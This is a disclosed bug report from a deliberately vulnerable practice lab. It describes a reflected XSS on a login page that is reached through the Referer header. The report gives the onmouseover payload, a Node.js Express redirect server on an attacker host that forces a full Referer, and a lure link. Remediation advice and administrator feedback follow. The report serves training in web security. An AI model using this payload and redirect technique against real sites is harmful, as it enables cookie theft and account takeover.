FirstBlood-#637 — Referer Based XSS on /login.php endpoint leading to ATO
This issue was discovered on FirstBlood v2
On 2021-10-26, holybugx Level 5 reported:
Getting started
Learn about vulnerability types 
Getting started in bug bounties 
Test your knowledge
Free Web Application Challenges
Guides for your hunts 
ZSeano's Methodology
Effective Note Taking for bug bounties
Useful Resources 
Disclosed HackerOne Reports 
Our community
Endorsed Members
Hackevents 
Member Articles
Description
Hello Sean,
The /login.php endpoint is vulnerable to Referer-based XSS which leads to account takeover. Previously there was an XSS possibility on this endpoint using the ref parameter. The developer properly fixed that vulnerability. However this time, the Referer header is reflected without sanitization on the /login.php endpoint, which results in another XSS.
Steps To Reproduce
- Open the
/login.php endpoint and click Secure Login, and you will face the Return to previous page button:
- Use the following payload as the
Referer header value, and observe the response:
'onmouseover=alert(document.cookie)//
The Referer value is reflected without proper sanitization in the source code. Hover your mouse over on the Return to previous page and XSS executes:
Exploitation
As this is a Referer based XSS, the exploitation scenario is different. The attacker hosts the following Node.js code on his server:
const express = require('express');
const app = express();
app.get('*', (req, res) => {
res.set('Referrer-Policy', 'unsafe-url');
res.set('Content-Type', 'text/html');
res.end('<script>location.replace("target-url");</script>');
});
app.listen(80);
Then the attacker gives the following link to the victim:
http://attacker.com/test'onmouseover=alert(document.cookie)//
- The server handles the requests and response with
<script>location.replace("target")</script>.
- In the redirect request the
referer will be set to http://attacker.com/test'onmouseover=alert(document.cookie)//
- The
referer-policy is needed because modern browsers don't pass referer with a path by default (only origin) for cross-domain navigation.
After the victim hovers the mouse over the Return to previous page, the XSS executes.
Impact
- XSS leading to various user's account takeover.
Remediation
- Implement proper sanitization of the
Referer header.
- Set
httponly cookies so that javascript can not access the cookies.
- Remove/Expire the
drps cookies after logging out.
Kind Regards,
HolyBugx
P3 Medium
Parameter:
Payload:
FirstBlood ID: 19
Vulnerability Type: Reflective XSS
The parameter ?ref= on login.php was fixed and instead the use of $_SERVER['HTTP_REFERER']; was used. Patrice tested in Chrome and Firefox and saw it was secure, but some users still use Internet Explorer 10 (governments for example!) and the Referer header is vulnerable to reflective XSS.
Report Feedback
Creator & Administrator
Nice find, thanks for providing a working PoC. Actually though from my testing I am only able to reproduce this on IE and the ' character is encoded for me on latest versions of Firefox and Chrome